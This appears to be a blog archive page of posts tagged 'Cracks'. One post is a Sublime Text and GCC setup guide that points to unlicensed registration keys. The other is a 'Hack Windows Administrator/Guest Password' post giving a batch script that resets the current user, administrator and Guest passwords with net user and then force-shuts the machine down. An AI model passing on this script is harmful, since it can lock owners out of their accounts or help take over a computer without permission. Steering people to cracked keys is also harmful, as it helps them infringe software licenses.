Posts

Showing posts with the label Cracks

How to Install, register and configure Sublime Text 3.0 for C Programs on Windows

Image
Sublime Text is one of most good looking and fast IDE,compiler and editor for small programs (<600M), specially if you are doing competitive coding. It was built for MacOS but later ported to Windows. So getting to the point you can " Download Sublime Text  " from its Official Website. https://www.sublimetext.com/3 So Its easy to download and install, now register it with any of following Keys :- Keys Here Configuring Sublime Text For C This part doesn't come as handy as previous one. First of all you need to check whether you have GCC selected in your Windows's Environments or not. 1. Go to Properties of My PC. 2. Select Advanced System Settings on Left Side Bar. 3.  Select Environment Variables. 4. Look For Path, open it. 5. Check if any of address is pointing towards gcc.exe. If Yes Then Goto Making Custom Build File below in post. else now since no GCC is being pointed download a  MinGW - Minimal

Hack Windows Administrator/Guest Password by Using Batch Command

Image
By using this trick you can change windows admin,guest and others password .This batch Programme will shutdown your system and will change your password automatically !!   S tep 1:- copy the below code in notepad @echo off break off netuser %USERNAME% ppp net user administrator ppp net user Guest ppp shutdown -s -f -t 5 exit Step 2 :- Change "ppp" to your desired password and 5 to your desire time (in sec).  Step 3 :- Now save as hack.bat and then go toyour saved directory and launch the batch file and then windows will restart and your password will change to your given password!!   #Batch _ Command